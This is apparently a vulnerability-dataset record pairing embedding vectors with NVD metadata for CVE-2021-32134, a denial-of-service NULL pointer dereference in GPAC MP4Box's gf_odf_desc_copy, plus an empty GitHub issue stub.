0.021647511050105095, 0.0032768347300589085, 0.002621825784444809, -0.009098540060222149, -0.010043471120297909, 0.00038052265881560743, 0.002906378824263811, 0.007580923847854137, 0.0008724505314603448, 0.007079824339598417, -0.0036383424885571003, -0.016350170597434044, 0.016063828021287918, -0.015319336205720901, 0.03149770200252533, 0.009291822090744972, -0.00713351322337985, 0.006628834176808596, 0.01970038004219532, 0.0054440912790596485, 0.010959768667817116, 0.029063787311315536, -0.01345810852944851, 0.023308299481868744, -0.001659893081523478, -0.023981204256415367, -0.004681703634560108, -0.014582003466784954, -0.0011972705833613873, 0.010637632571160793, -0.0035864426754415035, -0.00533313350751996, -0.011668466962873936, -0.036050550639629364, 0.0003691136953420937, -0.007452069781720638, 0.014861187897622585, 0.01723783276975155, 0.007580923847854137, -0.00428082374855876, -0.013823195360600948, -0.009091381914913654, -0.02784683182835579, 0.005952349863946438, -0.03006598725914955, 0.01593497395515442, 0.010229594074189663, -0.01709466055035591, -0.00843995250761509, 0.015777485445141792, 0.014589162543416023, -0.0006921440945006907, 0.014760968275368214, 0.01174005214124918, -0.04398224502801895, 0.005812757648527622, 0.006668206304311752, 0.012785202823579311, 0.016106778755784035, -0.026100140064954758, 0.008790722116827965, -0.007659668102860451, -0.002108198357746005, 0.006911597680300474, 0.01103135384619236, -0.011811638250946999, -0.006954549346119165, 0.004810558166354895, -0.026157408952713013, -0.007255209144204855, 0.0002280675107613206, 0.012105138972401619, -0.008397000841796398, -0.021060507744550705, 0.003933633212000132, 0.00836836639791727, 0.022578123956918716, -0.00748786237090826, -0.013415156863629818, -0.012033553794026375, 0.01995808817446232, -0.008711977861821651, 0.021146411076188087, 0.007981804199516773, 0.02310785837471485, -0.00047112329048104584, -0.0048606679774820805, -0.022678345441818237, 0.011396440677344799, -0.01616404764354229, 0.011876065284013748, 0.012799520045518875, 0.0062637473456561565, -0.013493901118636131, -0.0051899622194468975, 0.005257968325167894, -0.0023122176062315702, -0.017409637570381165, 0.02051645703613758, 0.0004626224981620908, -0.027560489252209663, -0.00454211188480258, 0.0013073335867375135, -0.002056298777461052, 0.0039586881175637245, 0.01945698820054531, -0.008082023821771145, 0.003955109044909477, -0.010630474425852299, 0.019142011180520058, 0.010630474425852299, -0.029321495443582535, -0.016464706510305405, -0.009642591699957848, -0.025999920442700386, -0.03501971811056137, 0.011396440677344799, 0.005572945345193148, 0.02856268733739853, -0.00466022826731205, -0.014932774007320404, 0.005902239587157965, 0.008332573808729649, 0.010408558882772923, -0.0013565487461164594, 0.006950969807803631, 0.010358448140323162, 0.011582563631236553, 0.019442671909928322, -0.030953649431467056, -0.045700300484895706, 0.03287214785814285, 0.0072265747003257275, 0.003622235730290413, -0.00861175823956728, 0.0008174190297722816, 0.012255469337105751, 0.009427834302186966, -0.004563587252050638, -0.017753249034285545, -0.017638713121414185, -0.0055622076615691185, -0.0071836235001683235, 0.006310278084129095, 0.012785202823579311, 0.005551469977945089, 0.014789602719247341, 0.01616404764354229, -0.012863947078585625, -0.014589162543416023, 0.006417656783014536, 0.019299499690532684, 0.023150810971856117, -0.008475745096802711, 0.004889302421361208, 0.012914057821035385, -0.003854889189824462, 0.019786283373832703, -0.00037694338243454695, 0.014789602719247341, -0.027775244787335396, -0.01732373610138893, -0.00036598180304281414, -0.0022424214985221624, -0.006507138721644878, -0.0178105179220438, 0.00004096602788195014, -0.008361208252608776, -0.020917337387800217, -0.0014120276318863034, 0.023537373170256615, 0.005691061727702618, 0.01386614702641964, 0.008783563040196896, -0.004710338078439236, 0.012706458568572998, 0.01971469819545746, 0.015763167291879654, -0.00832541473209858, -0.0011757948668673635, -0.005547890439629555, -0.0089052589610219, -0.003987322561442852, -0.00962111633270979, 0.02124663069844246, 0.01090249978005886, 0.020473506301641464, -0.01491845678538084, -0.02561335824429989, 0.01652197539806366, -0.006267326883971691, 0.026400800794363022, -0.01934245228767395, 0.0000017197342003782978, -0.027904100716114044, 0.019514257088303566, 0.00041519696242175996, -0.007194361183792353, 0.00615994818508625, -0.0023354829754680395, -0.014718016609549522, -0.005572945345193148, -0.007480704225599766, -0.013887622393667698, -0.0016589981969445944, -0.0328148789703846, -0.015176164917647839, -0.0043130372650921345, -0.010523095726966858, -0.03149770200252533, 0.021547291427850723, 0.009728494100272655, 0.008067706599831581, -0.01995808817446232, 0.007802839390933514, 0.010888182558119297, 0.007502179592847824, -0.018111178651452065, -0.00035233580274507403, -0.018569326028227806, -0.0006223480449989438, 0.009105699136853218, 0.017180563881993294, 0.0068113780580461025, 0.002691621659323573, -0.023566007614135742, 0.007802839390933514, -0.0034772746730595827, -0.0012438013218343258, 0.018354568630456924, 0.0025019196327775717, -0.009864507243037224, -0.01712329499423504, 0.01948562264442444, -0.017066027969121933, -0.012312737293541431, 0.027059389278292656, -0.015104579739272594, -0.028047271072864532, -0.010537412948906422, -0.0061098383739590645, -0.0017789042321965098, 0.014775285497307777, -0.011346330866217613, 0.0062637473456561565, 0.02453957311809063, 0.031784042716026306, -0.0014594531385228038, 0.022807199507951736, -0.002296110847964883, -0.004030274227261543, 0.003255358897149563, -0.004316616803407669, -0.0073196361772716045, 0.015333653427660465, -0.006217216607183218, -0.015476824715733528, -0.000016526226318092085, -0.007176464889198542, -0.011317696422338486, -0.005995301064103842, 0.005150590091943741, 0.017882103100419044, -0.008074864745140076, -0.0016992652090266347, -0.0020151371136307716, 0.009248870424926281, 0.02077416516840458, -0.012506019324064255, -0.007516496814787388, 0.005640951916575432, -0.0011829534778371453, 0.0038978406228125095, -0.016894221305847168, 0.003411057870835066, 0.01686558686196804, 0.013193241320550442, -0.005272285547107458, -0.003459378145635128, -0.015290701761841774, -0.012964167632162571, 0.03055277094244957, -0.000614742049947381, -0.01380171999335289, -0.013014277443289757, -0.005615897011011839, 0.03192721679806709, 0.004402519669383764, -0.0067183165811002254, -0.006163527257740498, 0.0024607579689472914, 0.0014952459605410695, -0.033215757459402084, 0.01745259016752243, -0.0028222654946148396, 0.012498860247433186, 0.017552809789776802, 0.005154169164597988, 0.004245031159371138, 0.012570446357131004, 0.02383803203701973, 0.0014469256857410073, -0.016794001683592796, 0.0021243051160126925, 0.004663807339966297, 0.019614476710557938, -0.003570335917174816, 0.005701799876987934, -0.010759328491985798, -0.03690958023071289, -0.0053510298021137714, -0.02781819738447666, -0.0006415867246687412, 0.0006523245247080922, 0.004434733185917139, 0.0029994400683790445, 0.009019795805215836, 0.03834129124879837, 0.0020974604412913322, -0.01457484532147646, 0.0008979529375210404, 0.01380171999335289, -0.0009359827963635325, -0.008475745096802711, 0.014238392934203148, 0.024926135316491127, 0.014073745347559452, 0.013465267606079578, -0.009234553202986717, 0.0010236753150820732, 0.025684943422675133, 0.011167366988956928, -0.007373325526714325, 0.007312477566301823, 0.0012867526384070516, -0.00071898871101439, 0.001275119953788817, 0.01935676857829094, 0.012813837267458439, -0.015949290245771408, -0.0012948060175403953, -0.005762647371739149, 0.0002233697014162317, 0.01521911658346653, -0.011024195700883865, -0.008397000841796398, -0.017538493499159813, 0.01137496531009674, -0.004767606500536203, 0.014653589576482773, 0.007008238695561886, -0.019972406327724457, -0.01156824640929699, -0.0021833633072674274, 0.00025480028125457466, 0.0026450911536812782, -0.0054619875736534595, -0.006167106796056032, -0.0037045590579509735, 0.011253269389271736, 0.03152633458375931, -0.007394801359623671, 0.007033293601125479, 0.0028974306769669056, 0.007248050533235073, -0.009599640034139156, -0.0027417317032814026, -0.01874113269150257, -0.012813837267458439, 0.008855149149894714, -0.01981491781771183, 0.0017028445145115256, 0.01009358186274767, -0.02040191926062107, 0.008117816410958767, 0.006510717794299126, -0.006797060836106539, 0.022019756957888603, 0.00044137047370895743, 0.024854550138115883, -0.004316616803407669, -0.0008675290155224502, -0.008790722116827965, 0.00843279343098402, 0.0002111777721438557, -0.00575190968811512, -0.02617172710597515, -0.004234293010085821, -0.019070426002144814, -0.0071084583178162575, -0.02380939945578575, -0.01921359822154045, 0.01090249978005886, -0.009692701511085033, 0.008175085298717022, 0.021490022540092468, -0.0034182164818048477, 0.005036052782088518, 0.008640391752123833, 0.013107338920235634, 0.0013771295780315995, 0.00021442149591166526, -0.00249476102180779, -0.009427834302186966, -0.006593041587620974, 0.01204071193933487, -0.0052901823073625565, -0.02180499956011772, -0.0007762572495266795, 0.009284663014113903, 0.04066066816449165, -0.022234514355659485, -0.0027739452198147774, 0.010487303137779236, -0.0162785854190588, -0.0015471456572413445, -0.022134292870759964, -0.009571005590260029, 0.023566007614135742, 0.017252149060368538, 0.0014567687176167965, 0.013486742973327637, 0.010064947418868542, 0.013816037215292454, -0.006424815393984318, -0.009835872799158096, 0.010143691673874855, -0.00745922839269042, 0.005630214232951403, -0.011761527508497238, -0.01818276382982731, -0.0157058984041214, -0.009563847444951534, 0.0013690761988982558, -0.003643711330369115, 0.0036526594776660204, 0.001430818811058998, 0.013887622393667698, -0.027417317032814026, -0.005154169164597988, -0.005551469977945089, -0.014152489602565765, -0.0025054989382624626, 0.005655269138514996, 0.01992945373058319, -0.014066587202250957, -0.004853509366512299, -0.01604950986802578, 0.016679463908076286, 0.02536996640264988, -0.005572945345193148, -0.018798401579260826, 0.016894221305847168, -0.01722351647913456, 0.013042911887168884, 0.005905819125473499, 0.008454269729554653, 0.026357848197221756, 0.00796748697757721, -0.017080344259738922, -0.019414037466049194, -0.027546171098947525, -0.007702619768679142, 0.00955668929964304, 0.006897280924022198, -0.016908539459109306, -0.011682783253490925, -0.007716936990618706, 0.0006089257076382637, 0.0078099980019032955, -0.013916256837546825, -0.006678944453597069, 0.0077742054127156734, -0.008246670477092266, -0.015720216557383537, 0.006976025179028511, -0.00646060798317194, 0.019041791558265686, 0.00808918196707964, -0.03928622230887413, 0.011618356220424175, 0.016808317974209785, 0.0004006561357527971, -0.004599380306899548, 0.0005458408268168569, -0.001598150352947414, -0.003489802125841379, 0.0017556388629600406, 0.010752169415354729, 0.00480697862803936, -0.012813837267458439, 0.017008759081363678, 0.004037432372570038, -0.0051720659248530865, 0.003409268334507942, 0.0050718458369374275, 0.02087438479065895, 0.014360087923705578, 0.007552289869636297, -0.00024808914167806506, -0.0009986202931031585, -0.015963608399033546, -0.0042879823595285416, -0.00861175823956728, 0.017882103100419044, 0.006174265407025814, -0.017767567187547684, -0.035105619579553604, 0.000941351754590869, 0.024038473144173622, 0.004459788091480732, 0.018912937492132187, 0.017066027969121933, -0.019729014486074448, -0.039830274879932404, -0.007430593948811293, -0.016221316531300545, -0.019285183399915695, -0.007190782111138105, 0.02194816991686821, -0.015534093603491783, 0.005197120830416679, -0.009406358934938908, -0.001017411588691175, -0.012563287280499935, 0.011303379200398922, 0.019199280068278313, 0.0035381224006414413, 0.006152789574116468, -0.005748330615460873, 0.008697660639882088, -0.006961707957088947, -0.0036902420688420534, -0.013916256837546825, 0.025284063071012497, 0.009055589325726032, -0.009406358934938908, -0.006678944453597069, -0.032499901950359344, 0.018082544207572937, -0.014453149400651455, -0.0039049990009516478, -0.0018665967509150505, -0.0009449310600757599, 0.013042911887168884, 0.0020974604412913322, 0.005222175735980272, 0.02160456031560898, 0.01567726396024227, -0.01828298345208168, -0.0035434914752840996, 0.02879176288843155, -0.00802475493401289, 0.01103135384619236, 0.010236753150820732, -0.004184183198958635, 0.0033466308377683163, 0.015190482139587402, 0.005529994145035744, 0.03247126564383507, 0.00005704484283342026, -0.007366166915744543, 0.01474665105342865, -0.0019292342476546764, 0.000659930519759655, 0.016436073929071426, 0.0026522495318204165, 0.010272545740008354, -0.011625515297055244, 0.018726814538240433, 0.004255768842995167, -0.004327354487031698, 0.004656648728996515, 0.009878824464976788, -0.015534093603491783, -0.016965806484222412, -0.02098892256617546, -0.0015918866265565157, -0.0003534543211571872, 0.009864507243037224, -0.015147530473768711, 0.017366686835885048, 0.008769246749579906, -0.012971325777471066, -0.011604038998484612, -0.0038155170623213053, -0.02380939945578575, 0.02844815142452717, 0.010229594074189663, 0.014417356811463833, 0.003459378145635128, 0.019499940797686577, 0.005018156487494707, -0.015548410825431347, -0.010243911296129227, -0.00202229549176991, 0.0027166767977178097, -0.026873266324400902, -0.01815412938594818, -0.0027488903142511845, 0.0015856229001656175, -0.007702619768679142, -0.005064687225967646, 0.001600834890268743, 0.005726854782551527, -0.0005708958487957716, 0.005293761380016804, 0.015290701761841774, -0.017724614590406418, 0.01556272804737091, -0.0001195704608107917, -0.015577045269310474, 0.0005682113696821034, 0.030810479074716568, -0.013286302797496319, -0.001264382153749466, 0.01038708258420229, -0.011238952167332172, -0.010515936650335789, -0.03135452792048454, 0.001072890474461019, -0.0019560789223760366, -0.023036273196339607, 0.0027041493449360132, -0.008640391752123833, -0.016235632821917534, -0.006392601411789656, 0.018096860498189926, 0.012420115992426872, 0.010437192395329475, -0.010243911296129227, -0.028734494000673294, 0.03444703295826912, 0.02547018602490425, -0.00837552547454834, 0.01639312133193016, -0.0024213858414441347, -0.01539092231541872, 0.013558329083025455, 0.0028777446132153273, 0.009420676156878471, -0.0006048990180715919, 0.0031479804310947657, -0.018927255645394325, -0.0025573985185474157, -0.008976845070719719, -0.019900821149349213, -0.0036132873501628637, 0.01137496531009674, 0.012355688959360123, 0.016708098351955414, 0.013071546331048012, 0.018927255645394325, -0.005977404769510031, 0.012498860247433186, -0.003622235730290413, -0.018927255645394325, 0.020917337387800217, -0.02018716372549534, 0.01150381937623024, -0.006865066941827536, 0.017509859055280685, -0.010608998127281666, 0.0020151371136307716, -0.0030406019650399685, 0.02703075483441353, 0.011045671068131924, -0.004227134864777327, 0.0012303789844736457, 0.0384271964430809, 0.026801681146025658, 0.01709466055035591, 0.00287595484405756, -0.00011257967707933858, 0.006439132150262594, -0.007015397306531668, 0.006779164541512728, -0.023150810971856117, -0.015319336205720901, 0.007616716902703047, -0.003278624266386032, -0.0007686513126827776, 0.013687183149158955, 0.0015784642891958356, -0.013586962595582008, 0.03547786548733711, -0.004091121722012758, 0.007265946827828884, 0.009291822090744972, 0.003937212750315666, -0.011904699727892876, -0.00820371974259615, -0.009707018733024597, -0.015777485445141792, -0.0011194210965186357, -0.007394801359623671, 0.023093542084097862, 0.008339731954038143, 0.010365607216954231, 0.010766486637294292, 0.008418476209044456, 0.00705118989571929, 0.003998060245066881, 0.008490062318742275, -0.007112037856131792, 0.017839152365922928, -0.010838072746992111, -0.001097945380024612, 0.022549491375684738, 0.0015605678781867027, 0.010823755525052547, 0.020688263699412346, 0.009341931901872158, -0.011661307886242867, -0.005866446997970343, 0.013293461874127388, 0.001598150352947414, 0.006338912528008223, -0.009098540060222149, -0.006331753917038441, 0.0032177765388041735, -0.001493456307798624, -0.00358465313911438, 0.0076310341246426105, 0.03149770200252533, 0.03164087235927582, 0.01292121596634388, -0.004363147541880608, -0.02274993062019348, 0.00004983034887118265, 0.0011301590129733086, -0.012613398022949696, 0.002552029676735401, 0.006553669460117817, 0.0135010601952672, -0.0010576784843578935, 0.007312477566301823, -0.01156824640929699, 0.008783563040196896, 0.004345251247286797, 0.0032356728333979845, 0.01238432340323925, 0.01073069404810667, -0.005555049050599337, -0.00031631923047825694, 0.010122215375304222, -0.02028738334774971, -0.019542891532182693, 0.01551977638155222, 0.006303119473159313, -0.013135973364114761, -0.028333613649010658, -0.018454790115356445, -0.011339172720909119, 0.011289061978459358, 0.01852637529373169, 0.011009878478944302, 0.0010684162843972445, -0.017882103100419044, -0.00430587911978364, -0.025298381224274635, -0.009592481888830662, 0.01745259016752243, -0.004484842997044325, 0.02065962925553322, -0.017266467213630676, 0.019499940797686577, 0.02431049756705761, 0.009370566345751286, 0.015347970649600029, -0.014224075712263584, -0.012863947078585625, 0.006242271512746811, -0.03859899938106537, 0.0322994589805603, 0.006761267781257629, 0.013322096318006516, -0.02664419263601303, 0.00023041642270982265, -0.010515936650335789, 0.00026799889747053385, -0.006689682137221098, 0.008296781219542027, 0.03324439004063606, -0.007502179592847824, 0.01652197539806366, -0.004212817642837763, 0.0012321686372160912, 0.013966366648674011, 0.01712329499423504, 0.000130308311781846, 0.00028119751368649304, -0.004767606500536203, -0.002577084582298994, 0.002063457388430834, 0.020602360367774963, -0.00646060798317194, 0.00819656066596508, -0.005730433855205774, -0.006804219447076321, -0.002976174931973219, -0.0046244352124631405, -0.0041340733878314495, 0.013214717619121075, 0.024153009057044983, -0.008053389377892017, -0.006134893279522657, -0.005075424909591675, 0.007076244801282883, 0.007659668102860451, 0.002414227230474353, -0.02358032390475273, -0.0016795791452750564, -0.025327015668153763, 0.009943251498043537, -0.013186083175241947, -0.012506019324064255, -0.025914017111063004, -0.0007583608385175467, 0.004237872548401356, 0.010594680905342102, -0.015462507493793964, 0.0008102604770101607, 0.027918417006731033, -0.015849070623517036, 0.024210277944803238, -0.015405239537358284, 0.028376564383506775, -0.024911819025874138, -0.022463588044047356, 0.03891397640109062, 0.012441592290997505, 0.001159688108600676, 0.02124663069844246, 0.004137652460485697, -0.017252149060368538, -0.02133253403007984, -0.025928335264325142, 0.011761527508497238, 0.000026690833692555316, -0.018125494942069054, -0.0056803240440785885, -0.04670250043272972, -0.016550609841942787, -0.0077742054127156734, -0.015018676407635212, -0.0045814840123057365, 0.00003042391654162202, -0.015949290245771408, 0.009606799110770226, -0.0135010601952672, -0.005619476083666086, 0.007938852533698082, 0.02770365960896015, -0.003171245800331235, -0.008017596788704395, 0.0037045590579509735, -0.024482304230332375, -0.016794001683592796, 0.050768569111824036, 0.012348530814051628, -0.003022705437615514, 0.012090821750462055, -0.002410647924989462, 0.011131573468446732, 0.005157748702913523, 0.005469146184623241, -0.011181684210896492, -0.0017108978936448693, -0.006847170647233725, -0.012978484854102135, 0.011618356220424175, -0.013307779096066952, -0.004402519669383764, 0.005039632320404053, 0.013622756116092205, -0.002736362861469388, -0.007566606625914574, -0.022091342136263847, -0.004649490118026733, -0.01043003425002098, -0.007423435337841511, -0.022592442110180855, -0.012627714313566685, 0.009170126169919968, 0.0028347931802272797, -0.023537373170256615, -0.015748851001262665, -0.012642031535506248, 0.01474665105342865, -0.011947650462388992, -0.007767046801745892, 0.005236492957919836, 0.0034826435148715973, 0.005136272870004177, 0.0034772746730595827, 0.022606758400797844, -0.02360895834863186, -0.020960288122296333, -0.017953690141439438, -0.0012339582899585366, -0.009112857282161713, 0.0021314637269824743, -0.01049446128308773, 0.012563287280499935, -0.023909619078040123, 0.029407398775219917, 0.020101260393857956, 0.029894182458519936, 0.0069294944405555725, -0.0006232428713701665, 0.0081392927095294, 0.007996120490133762, 0.02380939945578575, -0.009162968024611473, -0.007480704225599766, -0.0059344531036913395, -0.012606238946318626, -0.01888430304825306, 0.010236753150820732, 0.009993361309170723, -0.011997760273516178, -0.019285183399915695, -0.021031873300671577, -0.01025822851806879, 0.017738932743668556, 0.003504119347780943, -0.00955668929964304, 0.022621076554059982, -0.017023075371980667, 0.0179393719881773, -0.014088062569499016, -0.01580611988902092, -0.0014156069373711944, -0.019857868552207947, -0.014846870675683022, -0.006682523526251316, 0.02419596165418625, 0.002222735434770584, -0.001726109767332673, -0.030810479074716568, 0.008060548454523087, 0.0005185488262213767, 0.011274745687842369, -0.0030334433540701866, 0.00013813799887429923, -0.005018156487494707, 0.012097980827093124, -0.005555049050599337, 0.026329215615987778, 0.008311097510159016, -0.015161847695708275, -0.02524111233651638, 0.02370917797088623, -0.016321536153554916, 0.00849722046405077, 0.013837512582540512, 0.006968866568058729, 0.015032993629574776, 0.02005830965936184, 0.010043471120297909, -0.028992202132940292, -0.019528575241565704, 0.00979292206466198, -0.006653889548033476, 0.012706458568572998, -0.012506019324064255, -0.02206270769238472, -0.011417916975915432, 0.0076739853248000145, -0.006997500546276569, -0.016579244285821915, 0.014088062569499016, 0.011181684210896492, 0.011954809539020061, 0.019857868552207947, 0.006625255104154348, 0.01593497395515442, 0.022105658426880836, -0.029464667662978172, -0.008991162292659283, 0.0063997600227594376, -0.006063307635486126, -0.014152489602565765, 0.003733193501830101, 0.006256588734686375, 0.022434953600168228, 0.005125535186380148, -0.0038262547459453344, 0.006016776897013187, 0.007595241069793701, 0.006954549346119165, -0.0010156219359487295, 0.02160456031560898, -0.0054870424792170525, -0.000468886224552989, 0.012842471711337566, 0.006621676031500101, 0.006614517420530319, 0.007061927579343319, 0.025155209004878998, -0.0017422166420146823, -0.008590281940996647, -0.02348010428249836, 0.010823755525052547, -0.011231794022023678, -0.00007863240170991048, -0.008468586020171642, -0.005501359701156616, 0.017738932743668556, 0.015362287871539593, 0.007473545614629984, -0.00011028669541701674, 0.0030620775651186705, 0.00454211188480258, 0.012828154489398003, 0.017839152365922928, -0.033187124878168106, 0.009155808947980404, -0.005837812554091215, 0.018669545650482178, 0.014281343668699265, -0.0077742054127156734, 0.013959208503365517, -0.007545131258666515, 0.016221316531300545, -0.006281643640249968, 0.02121799625456333, 0.009334772825241089, -0.035563766956329346, 0.003140821820124984, 0.0019775545224547386, 0.0003644158714450896, 0.009485103189945221, 0.0004492001608014107, 0.008919576182961464, 0.009349090047180653, 0.011639832518994808, 0.011510978452861309, 0.012770886532962322, 0.015648631379008293, 0.010036312974989414, -0.00907706469297409, 0.021303899586200714, 0.0019149170257151127, -0.004345251247286797, -0.00796748697757721, 0.006979604251682758, -0.0007145146373659372, -0.007530814036726952, -0.006628834176808596, -0.0031068187672644854, 0.005311657674610615, 0.006596620660275221, 0.01438156422227621, 0.0002990939246956259, -0.003854889189824462, 0.014990041963756084, 0.0017037392826750875, 0.012642031535506248, -0.001775324926711619, 0.003196300705894828, -0.006721895653754473 ]
2,318
CVE-2021-32134
2021-09-13T14:15:07.720000
The gf_odf_desc_copy function in GPAC 1.0.1 allows attackers to cause a denial of service (NULL pointer dereference) via a crafted file in the MP4Box command.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/commit/328c6d682698fdb9878dbb4f282963d42c538c01" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1756" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1756
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
null
null dereference in MP4Box gf_odf_desc_copy
https://api.github.com/repos/gpac/gpac/issues/1756/comments
0
2021-04-23T00:50:46
2023-09-22T06:13:46Z
https://github.com/gpac/gpac/issues/1756
865,638,887
1,756
true
This is a GitHub Issue repo:gpac owner:gpac Title : null dereference in MP4Box gf_odf_desc_copy Issue date: --- start body --- None --- end body ---
150
[ -0.01026347279548645, 0.04348929226398468, -0.0069111729972064495, 0.035922154784202576, 0.013177255168557167, 0.016004059463739395, -0.015496684238314629, 0.05079549178481102, 0.003740079002454877, 0.01726524904370308, -0.021048815920948982, 0.02710832469165325, 0.01759866625070572, 0.010756351053714752, 0.00009207498078467324, 0.010401188395917416, -0.027398252859711647, 0.00771934911608696, -0.01542420219630003, -0.004392418544739485, 0.04595368355512619, -0.049200884997844696, -0.005222339183092117, 0.0392853245139122, -0.02083137072622776, 0.01613452658057213, -0.03450150415301323, 0.017091291025280952, 0.0137498639523983, 0.0002505164302419871, -0.001171492738649249, 0.005523140076547861, -0.005283948965370655, 0.03310984745621681, 0.061290908604860306, -0.0016353785758838058, 0.05001268535852432, 0.052390098571777344, 0.00802377425134182, -0.0026093574706465006, -0.012952560558915138, -0.03687891736626625, -0.04734534025192261, 0.011241981759667397, 0.004562751390039921, 0.024020584300160408, 0.03273294121026993, 0.009988040663301945, -0.043750226497650146, -0.007842568680644035, 0.034037619829177856, -0.028398506343364716, -0.00864712055772543, -0.05398470535874367, -0.010676620528101921, -0.04960678517818451, 0.03316783159971237, 0.005994273815304041, -0.008538397029042244, 0.037139855325222015, -0.013256985694169998, 0.03380567580461502, -0.005294821225106716, 0.017279744148254395, 0.008400681428611279, 0.03377668187022209, -0.009451672434806824, 0.02536875382065773, -0.021005326882004738, 0.025934113189578056, 0.02974667400121689, -0.021875113248825073, 0.003229079768061638, 0.04517087712883949, 0.015192259103059769, -0.045083899050951004, 0.03708186745643616, 0.0362410768866539, -0.021701155230402946, 0.007842568680644035, -0.03258797526359558, 0.006650237366557121, -0.031689196825027466, 0.006842315196990967, -0.015757620334625244, -0.016004059463739395, -0.00848041195422411, -0.07294603437185287, -0.023194288834929466, -0.03166020289063454, -0.018656905740499496, 0.03380567580461502, 0.010995542630553246, 0.018222013488411903, 0.019657159224152565, 0.0020566810853779316, -0.008639872074127197, -0.0013844091445207596, -0.023687167093157768, -0.022976841777563095, -0.02896386757493019, -0.014590657316148281, 0.009741601534187794, 0.00832819938659668, -0.0005939006223343313, 0.020179031416773796, 0.03795165568590164, -0.01243793684989214, 0.015322727151215076, 0.13962961733341217, 0.024948356673121452, -0.00544340955093503, -0.03021056018769741, 0.0010364947374910116, 0.03026854619383812, 0.029804660007357597, -0.011821839027106762, -0.018410466611385345, -0.015728626400232315, -0.038502518087625504, 0.005084623116999865, -0.004620736930519342, -0.016989815980196, 0.006563258823007345, -0.010821585543453693, 0.02874642051756382, -0.029891639947891235, 0.005762331187725067, -0.023107308894395828, -0.0016634654020890594, -0.04963577538728714, -0.013720870949327946, 0.016192512586712837, -0.0036712209694087505, -0.014119522646069527, -0.0065125213004648685, -0.035313304513692856, 0.013517920859158039, 0.003352299565449357, 0.03560323268175125, -0.07764288038015366, -0.038415540009737015, 0.040300074964761734, -0.020729895681142807, -0.01671438477933407, -0.0010509912390261889, 0.014010800048708916, -0.010161997750401497, -0.03163120895624161, -0.014634146355092525, -0.018019063398241997, -0.024643931537866592, 0.031254302710294724, -0.0021309752482920885, 0.052969954907894135, 0.00771934911608696, 0.004189468454569578, 0.01781611330807209, -0.024977348744869232, 0.005222339183092117, 0.004617113154381514, -0.01321349572390318, 0.015757620334625244, -0.017163773998618126, -0.011727612465620041, -0.019816620275378227, 0.028731925413012505, 0.004841807764023542, -0.015844598412513733, 0.01574312336742878, 0.0037581995129585266, -0.01542420219630003, 0.02880440652370453, 0.008755844086408615, -0.04534483328461647, -0.012082774192094803, 0.006965534761548042, 0.05210017040371895, -0.021063312888145447, -0.016163520514965057, -0.03128329664468765, 0.018932338804006577, 0.0029645198956131935, -0.015554669313132763, 0.0011415939079597592, -0.005997898057103157, 0.03632805496454239, -0.005349182989448309, 0.013793352991342545, -0.02907983958721161, 0.009632878005504608, 0.005454281810671091, -0.016033051535487175, -0.011618888936936855, 0.04659152776002884, -0.013844090513885021, -0.03569021075963974, -0.016453448683023453, -0.031022360548377037, 0.01687384396791458, 0.012546660378575325, -0.012416192330420017, 0.01511977706104517, 0.003634979948401451, -0.03922734037041664, -0.004334432538598776, -0.01961367018520832, 0.010923060588538647, 0.0075308955274522305, -0.0116623779758811, -0.018917841836810112, -0.027209799736738205, 0.011068024672567844, 0.007545392028987408, -0.01651143468916416, 0.015264741145074368, -0.018961330875754356, -0.024107564240694046, -0.024614939466118813, -0.02290436066687107, 0.029891639947891235, -0.015525677241384983, 0.014989309012889862, -0.0022614430636167526, -0.017352227121591568, -0.012952560558915138, 0.0013862211490049958, -0.0026111695915460587, -0.011198492720723152, 0.011379697360098362, 0.008545645512640476, 0.020077556371688843, 0.0017314173746854067, -0.0183669775724411, 0.010335954837501049, 0.01681585982441902, 0.0007547204149886966, -0.019251259043812752, 0.0010709237540140748, -0.002158156130462885, -0.008610880002379417, 0.04343130439519882, -0.027485230937600136, -0.02274489961564541, 0.014634146355092525, 0.0740477666258812, -0.018946833908557892, -0.018932338804006577, -0.0023919108789414167, 0.010647628456354141, 0.002018627943471074, -0.011379697360098362, -0.002709020394831896, 0.009024027734994888, -0.0071394918486475945, 0.005204218439757824, 0.01714927703142166, 0.04059000313282013, -0.010712862014770508, -0.03760373964905739, -0.006802449934184551, -0.01781611330807209, -0.00987931713461876, -0.030964374542236328, 0.009857572615146637, -0.025847135111689568, -0.022570941597223282, -0.008639872074127197, -0.015409705229103565, -0.0030533105600625277, 0.035922154784202576, -0.012597397901117802, -0.025745660066604614, -0.025325262919068336, -0.011183995753526688, -0.020048562437295914, 0.008777588605880737, 0.016583915799856186, 0.02183162420988083, 0.022063566371798515, -0.012858333997428417, -0.00392853282392025, -0.020541442558169365, 0.010147500783205032, 0.0027597579173743725, 0.002623853972181678, 0.005733338184654713, 0.006353060714900494, 0.008915304206311703, 0.03827057406306267, 